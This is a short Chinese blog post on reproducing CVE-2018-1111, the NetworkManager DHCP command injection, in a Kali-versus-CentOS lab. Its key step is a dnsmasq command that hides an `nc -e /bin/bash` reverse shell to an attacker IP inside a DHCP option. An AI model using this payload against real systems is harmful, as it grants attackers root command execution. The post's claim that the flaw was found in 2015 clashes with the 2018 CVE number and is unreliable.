前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2018-1111 DHCP RCE漏洞复现

CVE-2018-1111 DHCP RCE漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 17:39:04
1.1K0
发布2019-09-24 17:39:04
举报
文章被收录于专栏:安全漏洞环境学习

2015年5月,在Red Hat Enterprise Linux(CVE-2018-1111)的多个版本的DHCP客户端软件包提供的NetworkManager脚本中发现了命令注入漏洞,随后,RedHat提供了相应的补丁。当系统使用含有该漏洞的NetworkManager并配置了DHCP协议时,攻击者可以利用一个恶意的DHCP服务器或者本地网络构造的DHCP响应,在该系统上以root权限执行任意命令。

复现步骤:

1.kali配置

2. centos:网络:仅主机模式

3. 关闭虚拟机仅主机模式的DHCP功能

4.卡里下配置dns文件,新建文件,加入如下代码,作为dhcp服务器:

5.kali终端下输入:•dnsmasq-dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash192.168.0.105 4567 #"

6.复现结果

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-01-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云服务器
云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档